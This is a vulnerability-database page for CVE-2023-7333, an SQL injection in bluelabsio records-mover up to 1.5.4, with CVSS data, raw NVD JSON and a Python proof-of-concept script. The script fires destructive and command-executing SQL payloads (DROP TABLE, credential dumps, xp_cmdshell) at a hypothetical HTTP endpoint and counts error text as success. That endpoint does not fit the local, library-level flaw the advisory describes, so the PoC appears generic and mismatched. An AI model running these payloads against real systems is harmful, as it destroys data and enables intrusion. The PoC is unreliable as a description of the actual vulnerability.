Security Vulnerability Report
中文
CVE-2023-7333 CVSS 5.3 MEDIUM

CVE-2023-7333

Published: 2026-01-07 23:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

bluelabsio records-mover <= 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-7333 PoC - SQL Injection in bluelabsio records-mover Table Object Handler # Affected: records-mover <= 1.5.4 # Reference: https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa import requests import json # Target configuration TARGET_URL = "http://target-server/api/v1/table-handler" VULNERABLE_ENDPOINT = "/records-mover/table-object" # SQL Injection payload examples PAYLOADS = [ "table_name'; DROP TABLE users;--", "table_name' UNION SELECT * FROM credentials--", "table_name' AND (SELECT CASE WHEN 1=1 THEN 1/0 ELSE 0 END)--", "table_name'; EXEC xp_cmdshell('whoami');--" ] def test_sql_injection(target_url, payload): """Test for SQL injection vulnerability""" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (SQLi-Test)' } data = { 'table_name': payload, 'operation': 'move', 'source_db': 'source_database', 'target_db': 'target_database' } try: response = requests.post(target_url, json=data, headers=headers, timeout=10) # Check for SQL error indicators error_indicators = ['sql', 'syntax', 'mysql', 'postgres', 'sqlite', 'error', 'exception'] response_lower = response.text.lower() if any(indicator in response_lower for indicator in error_indicators): print(f"[+] Potential SQL Injection detected with payload: {payload}") print(f"[+] Response: {response.text[:200]}") return True elif response.status_code == 500: print(f"[!] Server error (500) with payload: {payload}") return True except Exception as e: print(f"[-] Error testing payload: {e}") return False def exploit_bluelabsio_records_mover(target_url): """Main exploitation function""" print(f"[*] Testing CVE-2023-7333 on {target_url}") print(f"[*] Target: bluelabsio records-mover Table Object Handler") for payload in PAYLOADS: print(f"\n[*] Testing payload: {payload}") if test_sql_injection(target_url, payload): print(f"[+] Vulnerable!") print("\n[*] Mitigation: Upgrade to records-mover >= 1.6.0") print("[*] Patch: https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa") if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit_bluelabsio_records_mover(sys.argv[1]) else: print("Usage: python cve_2023_7333_poc.py <target_url>") print("Example: python cve_2023_7333_poc.py http://vulnerable-server/api")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-7333", "sourceIdentifier": "[email protected]", "published": "2026-01-07T23:15:42.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component."}, {"lang": "es", "value": "Se ha identificado una debilidad en bluelabsio records-mover hasta 1.5.4. El elemento afectado es una función desconocida del componente Table Object Handler. Esta manipulación causa inyección SQL. El ataque necesita ser lanzado localmente. Actualizar a la versión 1.6.0 es suficiente para solucionar este problema. Nombre del parche: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. Debe actualizar el componente afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/bluelabsio/records-mover/", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/pull/254", "source": "[email protected]"}, {"url": "https://github.com/bluelabsio/records-mover/releases/tag/v1.6.0", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339566", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339566", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.